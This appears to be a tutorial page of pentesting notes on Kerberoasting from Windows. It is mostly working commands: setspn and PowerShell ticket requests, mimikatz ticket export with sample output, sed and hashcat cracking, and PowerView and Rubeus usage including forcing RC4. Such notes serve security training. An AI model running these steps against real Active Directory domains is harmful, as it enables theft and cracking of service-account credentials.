Kerberoasting - From Windows
Semi Manual Method
C:\> setspn.exe -Q */*→ lists various available SPNsPS C:\> Add-Type -AssemblyName System.IdentityModelPS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL:1433"The Add-Type cmdlet is used to add a .NET framework class to our PowerShell session, which can then be instantiated like any .NET framework object
The
AssemblyNameparameter allows us to specify an assembly that contains types that we are interested in usingSystem.IdentityModel is a namespace that contains different classes for building security token services
We'll then use the New-Object cmdlet to create an instance of a .NET Framework object
We'll use the System.IdentityModel.Tokens namespace with the KerberosRequestorSecurityToken class to create a security token and pass the SPN name to the class to request a Kerberos TGS ticket for the target account in our current logon session
We are requesting TGS tickets for an account and load them into memory to later extract using Mimikatz
PS C:\> setspn.exe -T DOMAIN.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }→ request tickets for all accounts with SPNs set.
Now lets extract tickets from mimikatz
Using 'mimikatz.log' for logfile : OK
mimikatz # base64 /out:true
isBase64InterceptInput is false
isBase64InterceptOutput is true
mimikatz # kerberos::list /export
<SNIP>
[00000002] - 0x00000017 - rc4_hmac_nt
Start/End/MaxRenew: 2/24/2022 3:36:22 PM ; 2/25/2022 12:55:25 AM ; 3/3/2022 2:55:25 PM
Server Name : MSSQLSvc/DEV-PRE-SQL:1433 @ DOMAIN.LOCAL
Client Name : USERNAME @ DOMAIN.LOCAL
Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ;
====================
Base64 of file : 2-40a10000-USERNAME@MSSQLSvc~DEV-PRE-SQL~1433-DOMAIN.LOCAL.kirbi
====================
doIGPzCCBjugAwIBBaEDAgEWooIFKDCCBSRhggUgMIIFHKADAgEFoRUbE0lOTEFO
RUZSRUlHSFQuTE9DQUyiOzA5oAMCAQKhMjAwGwhNU1NRTFN2YxskREVWLVBSRS1T
UUwuaW5sYW5lZnJlaWdodC5sb2NhbDoxNDMzo4IEvzCCBLugAwIBF6EDAgECooIE
<...................SNIP...................>
LkxPQ0FMqTswOaADAgECoTIwMBsITVNTUUxTdmMbJERFVi1QUkUtU1FMLmlubGFu
ZWZyZWlnaHQubG9jYWw6MTQzMw==
====================
* Saved to file : 2-40a10000-USERNAME@MSSQLSvc~DEV-PRE-SQL~1433-DOMAIN.LOCAL.kirbi
<SNIP>if we do not specify base64 /out:true , mimikatz will extract the tickets and write them to .kirbi files
decode this base64 Blob and save into file
sqldev.kirbithen use
kirbi2johnto extract Kerberos Ticket.sed 's/\$krb5tgs\$(.*):\(.*\)/\$krb5tgs\$23\$\1\$\2/' crack_file > sqldev_tgs_hashcat→ modify the file/hash for Hashcat**$**krb5tgs$23$sqldev.kirbi$813149fb261549a6a1b38e71a057feeab → it will look something like this
hashcat -m 13100 sqldev_tgs_hashcat /usr/share/wordlists/rockyou.txt→ finally cracking the hash.
Automated / Tool Based Route
setspn.exe -Q */*→ list available spns
Using PowerView
PS C:\> Import-Module .\PowerView.ps1→ importing powerviewPS C:\> Get-DomainUser * -spn | select samaccountname→ getting spn accountPS C:\> Get-DomainUser -Identity username | Get-DomainSPNTicket -Format Hashcat→ Targeting Specific UserPS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation→ Exporting All tickets to csv file
Using Rubeus
Rubeus does not need us to explicitly set the SPN or the user.
PS C:\> .\Rubeus.exe kerberoast /stats→ get the statsPS C:\> .\Rubeus.exe kerberoastwe can add flag
/nowrapso that hash will not be wrapped in any form so it will be easier to crack using hashcat.also we can use
/outfile:filenameto save the ticket, instead of displaying it.PS C:\> .\Rubeus.exe kerberoast /user:testspn /nowrap→ for specific user.
we can use /tgtdeleg flag to specify that we want only RC4 encryption when requesting a new service ticket.
RC4 is easier to crack compared to AES 256 and 128
Last updated
Was this helpful?